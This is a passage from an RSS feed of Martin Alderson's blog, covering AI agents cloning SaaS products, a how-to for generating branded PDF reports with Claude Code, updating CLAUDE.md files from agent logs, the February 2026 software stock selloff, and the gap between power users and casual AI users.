<p>I'm not a lawyer, but my rough understanding is that functionality itself cannot be copyrighted. While software patents may apply, I suspect unlike a lot of other technology companies SaaS companies are very patent light - it's very hard to patent a lot of the &quot;CRUD&quot; workflows that SaaS is famous at helping automate.</p>
<p>This puts them in a difficult place legally to enforce this. While they can certainly enforce their brand and trademarks, it's much more difficult for them to send C&amp;Ds if competitors are careful to not infringe that. Reverse engineering like this could certainly be against Terms of Service, but exactly how enforceable this is given they <em>ship</em> these files publicly is not clear to me - it's not &quot;hacking&quot; into their backends which is far more clear cut. And most SaaS contracts cap liability at fees paid, so even if a vendor successfully enforced a ToS breach, the damages from a $20/month subscription aren't exactly a deterrent.</p>
<p>They can however make it <em>much</em> harder to get your existing data out of their systems, and we are already starting to see a <em>lot</em> of API price changes in the SaaS marketplace. For example, the popular accounting platform (outside of the US), <a href="https://developer.xero.com/faq/pricing-and-policy-updates">Xero</a> has announced brutal API charges, which cost far more than the underlying SaaS fees in most cases. I'm not sure how related this is, but putting up tolls to get your data out is one option.</p>
<p>The issue though is that these APIs are just what people need to &quot;legitimately&quot; build agentic workflows against these products, so by making this expensive, you also reduce the utility of your product for new agentic workflows and make it more compelling for people to switch off.</p>
<p>Perhaps the most durable moat SaaS companies have is one that's rarely discussed: <em>liability</em>. Established vendors can take on contractual liability for data breaches, offer indemnification clauses, carry millions in cyber insurance, and back it all up with SOC2 audits and compliance certifications. Enterprise buyers are paying for more than software - they're paying for someone to be legally and financially on the hook when things go wrong. A two-person clone shop simply can't offer that. Maybe this, more than any technical moat, is what ultimately protects incumbent SaaS.</p>
<p>I certainly didn't have agents being able to take a HAR file and build a passable clone on my 2026 bingo card. I hope the industry finds a way to protect the incentives to build great software like Linear in the future. Because right now, I'm not sure what that looks like.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>There's a great article in the FT called <a href="https://www.ft.com/content/954ed03b-4119-4412-be9f-59f68b537a95"><em>How private equity’s big bet on software was derailed by AI</em></a> with more information about this trend which is well worth a read. <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn2" class="footnote-item"><p>There's no authentication system, no real-time collaboration, and some views are still using placeholder data. But given the loop I was in - find broken things, fix them, add tests, repeat - I don't think any of these would be particularly hard to continue with. The iterative improvement cycle was working well and each pass was producing noticeably better results. <a href="#fnref2" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn3" class="footnote-item"><p>Which famously resulted in Oracle losing their copyright lawsuit in <a href="https://en.wikipedia.org/wiki/Google_LLC_v._Oracle_America,_Inc.">Google LLC v. Oracle America, Inc</a> over Android reusing the Java APIs. <a href="#fnref3" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/attack-of-the-clones/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/attack-of-the-clones/</guid>
      <pubDate>Fri, 13 Feb 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>How to generate good looking reports with Claude Code, Cowork or Codex</title>
      <description>A step-by-step guide to extracting your brand design system and generating on-brand PDF reports and slide decks using coding agents.</description>
      <content:encoded><![CDATA[<p>Every organisation has brand guidelines that nobody follows for internal documents. Reports go out in whatever template someone found on Google Docs, slides are a mix of three different colour schemes, and the last person who knew how to use the &quot;official&quot; PowerPoint template left two years ago. I've replaced all of that with three prompts and a Node script. The output looks better than anything I've ever made in a word processor, and it's consistent every time.</p>
<h2>Step 1 - extract design system from your website</h2>
<p>The first step is to get your existing brand into your agent. They are <em>ridiculously</em> good at doing this. Use a prompt like this to start. For this example I'll use NASA.gov, but obviously replace this with your own organisation's site.</p>
<p>If you already have an existing brand document you can skip this and just ask it to make the design-system.html from your existing brand PDFs.</p>
<pre><code>  Curl https://www.nasa.gov and extract the brand design tokens — colors,
  typography (font families, sizes, weights), spacing, and any other visual
  patterns you can identify from the page's CSS and inline styles.
  Include the logo (ideally in svg on both dark and white backgrounds).

  Create a design-system.html file that displays all the extracted tokens
  as a visual reference sheet — color swatches with hex values, a type scale
  showing each heading and body style, and spacing examples. It should be
  self-contained (inline CSS, no external dependencies) so I can open it
  in a browser to verify you've captured the brand correctly.
</code></pre>
<p>It'll chew away for a while - it should grab your homepage with curl, find all the linked CSS/fonts and then make a self contained HTML file. This isn't used for the final output, but it's an intermediate step so you can check and make any adjustments before we make the final report template.</p>
<p>You can then open this file in your web browser and check it. It usually does a pretty good job on the first iteration, but if you want to add/modify/correct anything, do it now.</p>
<img src="https://martinalderson.com/img/design-system-report.png" alt="Design system HTML reference sheet extracted from NASA website" class="no-border" style="display: block; margin: 0 auto;">
<h2>Step 2 - make report template files</h2>
<p>Next step is to make the report template files. I'd start with making a report one and a slideshow format, using a prompt similar to this:</p>
<pre><code>Using the design system in design-system.html, create two HTML templates:

  1. report-template.html — A4 portrait (210mm x 297mm) document layout with
     print media queries set for clean PDF output. Include a cover page,
     headers/footers with page numbers, a table of contents section, and
     styled sections for headings, body text, code blocks, tables, and callout
     boxes. It should look like a professional NASA-style briefing document.

  2. slides-template.html — 16:9 landscape (254mm x 143mm) slide deck layout.
     Each &lt;section&gt; becomes one slide. Include a title slide, section divider
     slide, content slide with bullets, and a code/diagram slide. Use CSS
     page-break-after to separate slides for PDF rendering.

  Both templates should be self-contained, use the NASA brand tokens, and
  include print media queries that hide browser chrome and set exact page
  sizes. I want to open these in a browser to preview them.
</code></pre>
<p>This will generate the aforementioned two HTML files. Again, you can ask for any quick edits at this stage.</p>
<p>I'm pretty impressed with how these turned out - looks very slick:</p>
<img src="https://martinalderson.com/img/design-system-templates.png" alt="Report and slides templates using NASA brand design system" style="display: block; margin: 0 auto;">
<h2>Step 3 - make a markdown to PDF script and hint it in your CLAUDE.md file</h2>
<p>The final step is to make a markdown to PDF script that can convert your agent's markdown output to PDF.</p>
<p>I used this prompt to make the script:</p>
<pre><code>Create render.js — a Node.js script using Puppeteer that:

  1. Takes a markdown file as input and a flag for format: --format=report
     or --format=slides
  2. Converts the markdown to HTML (use marked or markdown-it — install
     whichever you prefer)
  3. Injects the HTML content into the matching template (report-template.html
     or slides-template.html)
  4. Renders it to PDF with Puppeteer using the correct page size and
     print media settings

  Usage should be: node render.js input.md --format=report -o output.pdf

  Run npm init -y and install the dependencies. Then test it by writing a
  short sample markdown file about a fictional NASA mission status report
  and rendering it as both a report and a slide deck.
</code></pre>
<p>You can grab my version (but I'd recommend iterating on it yourself as you'll want probably specific slide and report formats) with some sample markdown inputs - one for the report and one for the slides on <a href="https://gist.github.com/martinalderson/66007ed797ada48ac3a7d29907eb3b24">this gist</a>.</p>
<p>This then produced two pretty good looking PDF outputs - you can see them here:</p>
<ul>
<li><a href="https://martinalderson.com/assets/europa-report.pdf">Example report PDF</a></li>
<li><a href="https://martinalderson.com/assets/europa-slides.pdf">Example slides PDF</a></li>
</ul>
<p>The final step is to make a hint in your CLAUDE.md<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup> so your agent can do this (feel free to do it as a skill or plugin). I'd add something like this to my user CLAUDE.md file:</p>
<pre><code>## PDF Report &amp; Slide Generation

  When the user asks to turn content into a report or slides:

  1. Write the content as a markdown file with front-matter:
  ---   title: ...
     subtitle: ...
     category: ...
     author: ...
     date: ...
     doc_id: ...
     version: ...

  2. For **reports**: write detailed prose with subsections (H3), tables, code blocks, and blockquotes (rendered as callouts). Each H2 becomes a new page.
  3. For **slides**: write concise bullet points. Each H2 becomes a new slide. Keep content short — slides clip if overloaded. Sections with code blocks automatically get the dark code-slide layout.
  4. Render with: `node ~/tools/report-renderer/render.js &lt;file&gt;.md --format=report|slides -o output.pdf`
  5. Open the PDF for the user: `open -a &quot;Google Chrome&quot; output.pdf`
</code></pre>
<p>Now every time you want to turn something in your agent into a report or slide deck you can just ask it to 'turn it into a report' or 'turn it into slides' and you should get a great looking, consistent PDF output in your organisation's brand. I've actually found it <em>so much better</em> than trying to do this in Word or Google Docs - if you get any weird formatting problems you can just ask your agent to improve the layout instead of losing your mind trying to line things up in a word processor<sup class="footnote-ref"><a href="#fn2" id="fnref2">[2]</a></sup>.</p>
<p>As someone with little to no innate design skill, I'm really impressed with the quality of output this approach results in. This would have either required a designer to lay out in Figma or similar (which I can't justify for <em>every</em> document I want to make), or literally hours trying to do it myself to a far poorer standard.</p>
<p>I think this gets even more interesting when you can roll out these kind of techniques organisation wide - I've got some more thoughts on how to achieve that for a future blog, so stay tuned.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>CLAUDE.md is a markdown file that sits in your project root and gives coding agents like Claude Code context about your project - what it does, how to build it, conventions to follow, etc. Other agents use similar files (e.g. Codex uses AGENTS.md). <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn2" class="footnote-item"><p>While I'm intentionally keeping this simple, sometimes it's best to have the agent turn markdown into HTML, tweak it there (if it is changes you don't want on your &quot;global template&quot;) <em>then</em> output it to PDF. But for simple to moderately complicated documents the markdown approach works fine. <a href="#fnref2" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/how-to-make-great-looking-consistent-reports-with-claude-code-cowork-codex/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/how-to-make-great-looking-consistent-reports-with-claude-code-cowork-codex/</guid>
      <pubDate>Sun, 08 Feb 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Self-improving CLAUDE.md files</title>
      <description>A simple trick to keep your CLAUDE.md and AGENTS.md files updated using the agent&#39;s own chat logs - turning a tedious chore into a 30 second job.</description>
      <content:encoded><![CDATA[<p>One of the biggest things to improve how agentic tools like Claude Code/Cowork and Codex work is by using CLAUDE.md or AGENTS.md files<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup> - which give the agent context on the project.</p>
<p>I have found that it starts out being easy to keep on track of them with new projects, but quickly becomes a nightmare to keep them updated as complexity grows, and doing it by hand is quite tedious.</p>
<p>One quick trick I figured out recently is to use the agent's logs to identify common problems with the CLAUDE.md file. With Claude Code, these sessions are stored in <code>~/.claude/projects</code>, with Codex storing them in <code>~/.codex/sessions</code>. These agent logs are JSONL files which contain everything that happened in the agent session, including what <em>you</em> asked the agent to do, what <em>it</em> did. NB - while both use JSONL format files, the schema is totally different.</p>
<p>Now the &quot;trick&quot; is to get the agent to search through your existing chat logs and reference the current CLAUDE.md to spot potential optimisation efforts. This works ludicrously well in my experience and takes updating CLAUDE.md from a chore to a 30 second job for each project.</p>
<p>A prompt like &quot;please search through my claude jsonl history files for this project, and analyse improvements to the current claude.md file. Note any times I get frustrated or any patterns of me asking the same thing between sessions&quot; works very well.</p>
<p>One issue I did have was it struggles a bit to parse the JSONL efficiently, writing superhuman-level complexity jq bash commands.</p>
<p>As such I built a little CLI to abstract the searching - I've <a href="https://github.com/martinalderson/claude-log-cli">open sourced it on GitHub</a> with prebuilt binaries for Mac and Linux, but I suspect this screenshot alone is enough to allow your agent to build one exactly to your liking (!):</p>
<img src="https://martinalderson.com/img/claude-log-help.png" alt="claude-log CLI help output showing commands for parsing and analysing Claude Code chat logs" class="no-border" style="display: block; margin: 0 auto;">
<p>This allows the agent to search the logs <em>extremely</em> efficiently. Without it, it took a good few minutes to come up with suggestions on projects with even a moderate amount of chat sessions to analyse - with it, a few seconds. There's really no reason this couldn't run as a scheduled task every day/week and just improve itself. I've found that curating the suggestions quickly helps, but I'm sure with a more detailed prompt it could be better at self-improving itself.</p>
<p>I hope this is useful. I've got some further thoughts on how to manage this in an organisation/enterprise sense at scale, but in the meantime enjoy a much easier CLAUDE.md file.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>I really wish Anthropic would adopt AGENTS.md, if for no other reason than making my writing less clunky. <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/self-improving-claude-md-files/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/self-improving-claude-md-files/</guid>
      <pubDate>Sun, 08 Feb 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Wall Street just lost $285 billion because of 13 markdown files</title>
      <description>Anthropic&#39;s &#39;legal tool&#39; that triggered a $285bn selloff is 156KB of markdown. The panic reveals a hard truth about the future of software.</description>
      <content:encoded><![CDATA[<p>The &quot;<a href="https://www.bloomberg.com/news/articles/2026-02-04/what-s-behind-the-saaspocalypse-plunge-in-software-stocks">SaaSpocalypse</a>&quot; began on the 3rd of February 2026 - with <a href="https://www.bloomberg.com/news/articles/2026-02-03/legal-software-stocks-plunge-as-anthropic-releases-new-ai-tool">$285bn wiped off</a> technology companies on the public markets. According to <a href="https://www.cnbc.com/2026/02/06/ai-anthropic-tools-saas-software-stocks-selloff.html">CNBC</a>, <a href="https://www.cnn.com/2026/02/04/investing/us-stocks-anthropic-software">CNN</a> and <a href="https://www.fastcompany.com/91487960/why-one-anthropic-update-wiped-billions-off-software-stocks">seemingly every other financial outlet</a>, the catalyst was Anthropic launching a legal tool. I use Claude <em>a lot</em>, and I hadn't heard of it. A cursory web search didn't bring anything up.</p>
<p>It turns out the &quot;legal tool&quot; in question is a collection of markdown files in the knowledge-work-plugin on GitHub.</p>
<p><img src="https://martinalderson.com/img/saaspocalypse-github-legal-folder.png" alt="Claude Cowork knowledge-work-plugins legal folder on GitHub"></p>
<p>It's approximately 156KB - which means for every <em>byte</em> of markdown, nearly $1mn was wiped off SaaS company valuations.</p>
<h2>SaaS has a markdown-sized hole in its moat</h2>
<p>While the immediate sell-off feels panic-induced - a few thousand words in a text file <em>do not</em> justify this level of drawdown in company valuations - there is a serious point at hand.</p>
<p>As I wrote in <a href="https://martinalderson.com/posts/ai-agents-are-starting-to-eat-saas/">AI agents are starting to eat SaaS</a> at the end of last year, SaaS has a serious issue with agentic tooling being able to replicate software.</p>
<p>This incident really leans into a deeper issue though that I've been thinking about. Instead of SaaS being replaced by &quot;agentically-built&quot; SaaS, what if people just <em>don't need</em> (as much) SaaS?</p>
<p>Increasingly I'm realising that agentic workflows often completely bypass SaaS, and actually operate on a much higher level than most SaaS products.</p>
<p>For example - to take legal review - there are dozens of legal review SaaS products out there. Some are &quot;AI native&quot;, most old school SaaS UIs (and let's not forget Microsoft Word with probably the most marketshare).</p>
<p>All of these are being disrupted by agentic tooling. Instead of having a UI with buttons to click to do various tasks, you instead just ask the agent <em>exactly</em> what you need, and it goes away and does it.</p>
<p>This gets even more powerful with the agent having access to source material. Back in the summer I found that Claude Code + a bunch of text files was <a href="https://martinalderson.com/posts/building-a-tax-agent-with-claude-code/">very good at tax questions</a>. This was something I put together in a few minutes out of pure curiosity.</p>
<p>The really interesting thing is very few (none?) tax SaaS platforms can do the sort of detailed question answering that that experiment shows. They're focussed on automating a <em>process</em> (filing your taxes) whereas agents (especially with the right source material available) can provide answers on what to file, how to file it and why certain things should be filed.</p>
<p>To me this seems like working a level above &quot;legacy&quot; SaaS - it replaces the professional services angle <em>as well</em> as the SaaS platform that previously your lawyer or accountant might use on your behalf.</p>
<p>Now I'm not suggesting for one second that people trust their tax filing or legal review <em>entirely</em> to an agent. But I think Wall Street is directionally right on this - a bunch of text files in a folder is actually remarkably powerful.</p>
<h2>But some still <em>do</em> have moats</h2>
<p>Having said that, some SaaS providers definitely <em>do</em> still have significant moats (for now, at least!). If you're a system of record - this actually becomes increasingly valuable in an agentic future.</p>
<p>For example, if you hold a company's accounting transaction data and related records, and expose it over MCP (or an old school API that can be wrapped into a CLI - which <a href="https://martinalderson.com/posts/why-im-building-my-own-clis-for-agents/">works better</a> in my view), agents can use this with remarkable efficiency. You can ask questions, have the agent use the various tools that the service provides and build extremely detailed reports, presentations and dashboards in minutes. Even better, these can be exported into really good looking, professional documents or dashboards (this will be a topic of a future post) in seconds.</p>
<p>I don't see agents replacing these system of records any time soon - though making predictions on this is a fool's game<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup>. They're difficult to build, often contain a lot of carefully (you'd hope) thought through business logic and exporting data out of them is difficult.</p>
<p>However - on the flip side - this can be a real weakness for certain players. A few people I know are already starting to hit real limitations with certain systems of record. They either don't have functional APIs <em>or</em> rate limit their APIs to such an extent that agentic use is impossible. This unfortunately is very common with many legacy platforms - they had public APIs grafted on to them as an oversight and aren't well built and often expose decades of technical and infrastructure debt which is hard for them to resolve.</p>
<p>Equally, they may not support proper API token scoping - so you might have one API key for the entire platform (meaning no way to lock certain users agents down) and/or ability to allow certain API tokens access to certain parts of data or tasks. This just doesn't work at scale.</p>
<p>I think we'll start hearing more and more about companies doing extremely expensive and time consuming migration processes away from certain vendors<sup class="footnote-ref"><a href="#fn2" id="fnref2">[2]</a></sup> - not because they have replaced it with an internal equivalent, but that certain vendors simply can't offer the programmatic access that their customers demand.</p>
<h2>The winners will be headless</h2>
<p>So what does agentic-first software look like? Initially I thought we would see people replace SaaS tools (intentionally<sup class="footnote-ref"><a href="#fn3" id="fnref3">[3]</a></sup> or not) with their home grown versions. While that's definitely true, the improvement in agentic harnesses <em>and</em> the underlying models have meant that I think there's a whole new category ready to emerge.</p>
<p>Effectively, API first solutions for each vertical. These are products built from the ground up to allow programmatic access - instead of the other way round where the UI is the main feature and API access is a checkbox on their feature list.</p>
<p>This means really thinking through the most flexible way to offer access to data. It also means generous and <em>fast</em> API access to it, along with access and permissions to control and secure it at scale.</p>
<p>This isn't actually a new concept - we've had so-called &quot;headless&quot; CMSs and ecommerce platforms<sup class="footnote-ref"><a href="#fn4" id="fnref4">[4]</a></sup> before AI came along. But I now think we'll see an explosion of them.</p>
<p>So in a way markdown <em>might</em> replace SaaS. But it needs the data and processes available to it - and a broad based selloff is far too simplistic to cover all the different dynamics at play. But professional services firms should be equally as concerned. It's actually <em>their</em> expertise which is starting to be turned into markdown files.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>I was hypothesising recently that we are at the stage where an agent could export data from any platform with a web browser and network logs. No doubt some legal considerations, but I think it's remarkably doable. <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn2" class="footnote-item"><p>This is not the same as Klarna's much touted Salesforce replacement - which had to be walked back. I'm meaning switching from systems of record that have unworkable API access to ones that do. <a href="#fnref2" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn3" class="footnote-item"><p>I'm sure I have not used many SaaS tools because the agent has just built it for me. Previously I'd look for one, but now an agent can just build what I need as part of a project. For example, I'd have definitely built this blog on Substack (or similar), but it took a minute or two to have Claude Code build it on eleventy. I didn't <em>think</em> to not use Substack! <a href="#fnref3" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn4" class="footnote-item"><p>Shopify offers a headless version of their platform called Hydrogen. There's many headless CMSs out there - like Contentful, Hygraph and Strapi. These allow developers to build their own UIs on top of the APIs they provide <a href="#fnref4" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/wall-street-lost-285-billion-because-of-13-markdown-files/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/wall-street-lost-285-billion-because-of-13-markdown-files/</guid>
      <pubDate>Thu, 05 Feb 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Two kinds of AI users are emerging. The gap between them is astonishing.</title>
      <description>A bifurcation is happening in AI adoption - power users shipping products in days versus everyone else generating meeting agendas. Enterprise tool choices are accelerating the divide.</description>
      <content:encoded><![CDATA[<p>It still shocks me how much difference there is between AI users. I think it explains a lot about the often confusing (to me) coverage in the media about AI and its productivity impact.</p>
<p>I think it's clear there are two types of users to me now, and by extension, the organisations they work for.</p>
<p>First, you have the &quot;power users&quot;, who are all in on adopting new AI technology - Claude Code, MCPs, skills, etc. Surprisingly, these people are often <em>not very technical</em>. I've seen far more non-technical people than I'd expect using Claude Code in terminal, using it for dozens of non-SWE tasks. Finance roles seem to be getting enormous value out of it (unsurprisingly, as Excel on the finance side is remarkably limiting when you start getting used to the power of a full programming ecosystem like Python).</p>
<p>Secondly, you have the people who are generally only chatting to ChatGPT or similar. <em>So many</em> people I wouldn't expect are still in this camp.</p>
<h2>M365 Copilot has a lot to answer for</h2>
<p>One extremely jarring realisation was just how poor Microsoft Copilot is. It has <em>enormous</em> market share in enterprise as it is bundled in with various Office 365 subscriptions, yet feels like a poorly cloned version of the (already not great) ChatGPT interface. The &quot;agent&quot; feature is absolutely laughable compared to what a CLI coding agent (including Microsoft's own GitHub confusingly-named-Copilot CLI).</p>
<blockquote>
<p>To really underline this, Microsoft itself is rolling out Claude Code to internal teams<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup>, despite (obviously) having access to Copilot at near zero cost, and significant ownership of OpenAI. I think this sums up quite how far behind they are</p>
</blockquote>
<p>The problem is that in enterprise Copilot is often the only allowed AI tool, so that's all you can use without either potentially losing your job or spending a lot of effort trying to procure and use another AI tool. It's slow, the code execution tool in it doesn't work properly and fails horribly with large(ish) files, seemingly due to very very aggressive memory and CPU limitations.</p>
<p>This is becoming an existential risk for many enterprises. Senior decision makers are no doubt using these tools with such poor results and are therefore writing off AI, and/or spending a fortune with various large consulting and management consultancy outfits to get not very far.</p>
<h2>Why enterprise is so at risk</h2>
<p>Enterprise corporate IT policy results in a completely disastrous combination of limitations that basically ensure that people cannot successfully use more 'cutting edge' AI tooling.</p>
<p>Firstly, they tend to have extremely locked down environments, with no ability to run even a basic script interpreter locally (VBA if you are lucky, but even that may be limited by various Group Policies). Secondly, they're locked into legacy software with no real &quot;internal facing&quot; APIs on their core workflows, which means agents have nothing to connect to even if you could run them.</p>
<p>Finally, they tend to have extremely siloed engineering departments (which may be completely outsourced), so there's nobody internally who could build the infrastructure to run safely sandboxed agents even if they wanted to.</p>
<p>The security concerns are real. You definitely do not want people YOLOing coding agents over production databases with no control, and <a href="https://martinalderson.com/posts/why-sandboxing-coding-agents-is-harder-than-you-think/">as I've covered</a>, sandboxing agents is <em>difficult</em><sup class="footnote-ref"><a href="#fn2" id="fnref2">[2]</a></sup>.</p>
<p>However, this does cause a real problem in so much that you don't have an engineering team that can help build the infrastructure to run safely sandboxed agents against your datasets.</p>
<h2>The gap</h2>
<p>I've also spoken to many smaller companies that don't have all this baggage and are <em>absolutely flying</em> with AI. The gap is so obvious when you can see both sides of it.</p>
<p>On one hand, you have Microsoft's (awful) Copilot integration for Excel (in fairness, the Gemini integration in Google Sheets is also bad). So you can imagine financial directors trying to use it and it making a complete mess of the most simple tasks and never touching it again.</p>
<p>On the other you have a non-technical executive who's got his head round Claude Code and can run e.g. Python locally. I helped one recently almost one-shot<sup class="footnote-ref"><a href="#fn3" id="fnref3">[3]</a></sup> converting a 30 sheet mind numbingly complicated Excel financial model to Python with Claude Code.</p>
<p>Once the model is in Python, you effectively have a data science team in your pocket with Claude Code. You can easily run Monte Carlo simulations, pull external data sources as inputs, build web dashboards and have Claude Code work with you to really integrate weaknesses in your model (or business). It's a pretty magical experience watching someone realise they have so much power at their fingertips, without having to grind away for hours/days in Excel.</p>
<p>This effectively leads to a situation where smaller company employees are able to be <em>so much</em> more productive than the equivalent at an enterprise. It often used to be that people at small companies really envied the resources &amp; teams that their larger competitors had access to - but increasingly I think the pendulum is swinging the other way.</p>
<h2>The future</h2>
<p>I'm starting to get a feel for what the future of work looks like. The first observation is that (often) the real leaps are being made organically by employees, not from a top down AI strategy. Where I see the real productivity gains are small teams deciding to try and build an AI assisted workflow for a process, and as they are the ones that know that process inside out they can get very good results - unlike an often outsourced software engineering team who have absolutely zero experience doing the process that they are helping automate. I think this is the opposite of what most 'digital transformation' projects looked like in enterprise.</p>
<p>Secondly, companies that have some sort of APIs for <em>internal</em> systems are going to be able to do far more than those that don't. This might be as simple as a readonly data warehouse employees can connect to and run queries on behalf of users, or it could be as far as many complex core business processes being completely APId.</p>
<p>Thirdly, this all needs to be wrapped up in some sort of secure mechanism, but I actually think a hosted VM running some sort of code agent with well thought through network restrictions would work well, at least for read only reporting. For creating and editing data I don't think we quite have the model for non technical users (especially) to be able to use agents safely (yet).</p>
<p>Finally, legacy enterprise SaaS players either have enormous lock in, or are extremely vulnerable depending on how you look at it. Most are not &quot;API-first&quot; products, and the APIs they have tend to be really for developer usage - not optimised for thousands of employees to ping in weird and wonderful inefficient ways. But if they are the source of truth for the company, they are going to be very difficult to migrate away from <em>and</em> bottleneck a lot of productivity gains.</p>
<p>Again, smaller companies tend to use newer products which have far better thought through APIs (simply because they weren't often originally created many decades ago with various interfaces grafted on over time).</p>
<img src="https://martinalderson.com/img/future-of-work-flowchart-padded.png" alt="The future of knowledge work - user prompting an agent that connects to systems via APIs and generates outputs" style="display: block; margin: 0 auto; max-width: 100%;">
<blockquote>
<p>The user prompts, the agent synthesises - connecting to APIs and producing outputs on demand.</p>
</blockquote>
<p>What I've come to realise is that the power of having a <a href="https://martinalderson.com/posts/why-im-building-my-own-clis-for-agents/">bash sandbox</a> with a programming language and API access to systems, combined with an agentic harness, results in outrageously good results for non technical users. It can effectively replace nearly every standard productivity app out there - both classic Microsoft Office style ones - and also web apps. It can build any report you ask for - and export it however you like. To me this seems like the future of knowledge work.</p>
<p>The bifurcation is real and seems to be, if anything, speeding up dramatically. I don't think there's ever been a time in history where a tiny team can outcompete a company one thousand times its size so easily.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p><a href="https://blog.devgenius.io/microsoft-is-using-claude-code-internally-while-selling-you-copilot-d586a35b32f9">Microsoft is using Claude Code internally while selling you Copilot</a> <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn2" class="footnote-item"><p>Let's keep in mind that users already have access to these systems. CISOs need to figure out how to enable these kind of secure VMs en masse. There's already precedent for this with Codespaces - it just requires a similar approach scaled up to the entire organisation. <a href="#fnref2" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn3" class="footnote-item"><p>Two or three prompts got it there, using plan mode to figure out the structure of the Excel sheet, then prompting to implement it. It even added unit tests to the Python model itself, which I was impressed with! <a href="#fnref3" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/two-kinds-of-ai-users-are-emerging/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/two-kinds-of-ai-users-are-emerging/</guid>
      <pubDate>Sun, 01 Feb 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Turns out I was wrong about TDD</title>
      <description>I used to be a TDD sceptic - too much time writing tests for features that might get deleted. Then coding agents completely changed the economics of software testing.</description>
      <content:encoded><![CDATA[<p>I've been a TDD sceptic for most of my career. The economics never made sense - why spend hours writing tests for features that might not survive first contact with users? Then coding agents came along and completely flipped the calculation.</p>
<h2>How I used to think about testing</h2>
<p>I've worked on a lot of different projects over the years. I was most comfortable heavily leaning into e2e based tests, running against the full application running in Docker.</p>
<p>Combined with TestContainers (which is awesome!) it was very easy to spin up a complete copy of your entire infrastructure and run it against each commit. I tended to combine browser based testing with API testing, where you would run through each use case of the app and run the API requests the client would make in sequence and assert various parts.</p>
<p>Depending on the project, there would be some level unit testing for core 'calculations' or 'business logic', with projects with complex financial or business logic requiring more unit tests.</p>
<p>I found this very successful - in my experience so many bugs and errors in software aren't caught by unit tests per sé, especially in complex web or mobile apps. The <em>hard</em> bit about these apps is the very complex interplay between the client, state, backend, caches, message queues, databases and often 3rd party services at various levels of the stack. Unit tests tend to avoid testing this (by definition).</p>
<p>The issue with heavy e2e testing is it is slow. You have to spin up all the related infrastructure, start your application(s), seed data, and then execute the tests. Browser based tests are especially slow, as you now need to run browser(s) to execute the workflows. We'll come back to this later, but LLMs change the calculus on this directly in my experience.</p>
<h2>TDD scepticism</h2>
<p>I definitely used to think of myself as a TDD sceptic. While I've always seen the promise of it, in my experience it often led to codebases that were optimised to be easy to test, but <em>not</em> focussed on <em>product outcomes</em>. To be clear, for some codebases this is the correct outcome. If you're building highly critical software which has a highly defined use case (that doesn't change much), then optimising for this is the right call. Stability/reliability actually is the most important product outcome.</p>
<p>I've been involved with some codebases that had definitely drank the TDD kool-aid too much. It was clear there was pushback on product changes based on how difficult it was to update the codebases <em>tests</em>. If you've done TDD and your product definition changes dramatically, it can result in an awful lot of tests going in the bin and a lot of new ones having to be written. Often this is for  seemingly (product facing) trivial things that change a lot of assumptions about the data model of the product at hand.</p>
<p>I'm sure you could (and there will be many that do!) argue that actually this is the whole point - TDD makes you really think hard about how you are going to build reliable, testable software upfront and avoid the technical debt of it later down the line. The issue though is that this often led to a culture of treating the tests as <em>more</em> important than user requirements, which often ended up with <em>so much</em> time being spent writing tests for features that didn't get user traction and were deleted anyway<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup>.</p>
<h2>Enter LLMs</h2>
